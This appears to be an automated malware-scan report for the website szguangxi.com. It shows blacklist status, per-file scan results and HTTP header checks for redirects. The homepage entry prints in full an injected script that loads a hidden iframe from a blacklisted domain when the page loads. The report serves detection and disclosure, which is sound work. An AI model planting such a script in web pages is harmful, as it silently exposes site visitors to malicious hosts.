Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=szguangxi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://szguangxi.com/ | 200 OK Content-Length: 32262 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } | ||
http://golax.net/wp-content/themes/tasty-showcase/j/karma-0.2.js | 200 OK Content-Length: 97657 Content-Type: application/x-javascript | clean |
http://golax.net/wp-content/themes/tasty-showcase/j/karmic-flow-0.2.js | 200 OK Content-Length: 8391 Content-Type: application/x-javascript | clean |
http://golax.net/wp-content/themes/tasty-showcase/j/iepngfix_tilebg.js | 200 OK Content-Length: 4345 Content-Type: application/x-javascript | clean |
http://golax.net/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/x-javascript | clean |
http://golax.net/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/x-javascript | clean |
http://golax.net/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://lite.piclens.com/current/piclens_optimized.js | 200 OK Content-Length: 291 Content-Type: text/html | clean |
http://lite.piclens.com/test404page.js | 200 OK Content-Length: 291 Content-Type: text/html | clean |
http://canexback.com/stats.js | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: szguangxi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 27 Jan 2015 09:56:39 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=c9eaad1e837f9f8da51db9d5fe4e2d5b; path=/
X-Powered-By: PHP/5.1.4
X-Powered-By: ASP.NET
GET / HTTP/1.1
Host: szguangxi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 27 Jan 2015 09:56:39 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=c9eaad1e837f9f8da51db9d5fe4e2d5b; path=/
X-Powered-By: PHP/5.1.4
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: szguangxi.com
Referer: http://www.google.com/search?q=szguangxi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: szguangxi.com
Referer: http://www.google.com/search?q=szguangxi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.